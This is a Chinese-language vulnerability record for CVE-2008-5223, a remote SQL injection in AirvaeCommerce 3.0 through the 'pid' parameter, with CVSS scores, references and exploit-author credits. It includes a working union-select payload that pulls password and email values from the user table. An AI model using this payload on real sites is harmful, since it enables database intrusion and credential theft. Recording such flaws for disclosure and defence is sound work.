关键漏洞信息 漏洞名称: AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability CVE编号: CVE-2008-5223 CVE类型: CWE-89 风险等级: High 漏洞时间: - 发布日期: 2008-11-26 - 更新日期: 2008-11-27 是否本地漏洞: No 是否远程漏洞: Yes CVSS评分 CVSS基础评分: 7.5/10 - 利用范围: Remote - 机密性影响: Partial 影响子评分: 6.4/10 - 攻击复杂度: Low - 完整性影响: Partial 可利用子评分: 10/10 - 身份验证: No required - 可用性影响: Partial 漏洞细节 漏洞文件: http://localhost/ path script / ?p=vzh&pid= [SQL] 示例: /?p=vzh&pid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/ 注意: 有些站点使用的SELECT语句的列数不同,大约为45。 引用 XForce ISS Milw0rm Secunia 其他 作者: QTRinux [Qataro (at) hotmail (dot) Com] 应用: AirvaeCommerce 3.0 下载: http://www.airvaeecommerce.com 价格: $179 模块: By AirvaeCommerce 3.0 致谢: Allah, InjecTor, AlQaTaRi, all InjEctOrS TeaM, TrYaG TeaM & Muslims Hackers 使用条款**: 该漏洞仅供教育用途,禁止用于非法行为。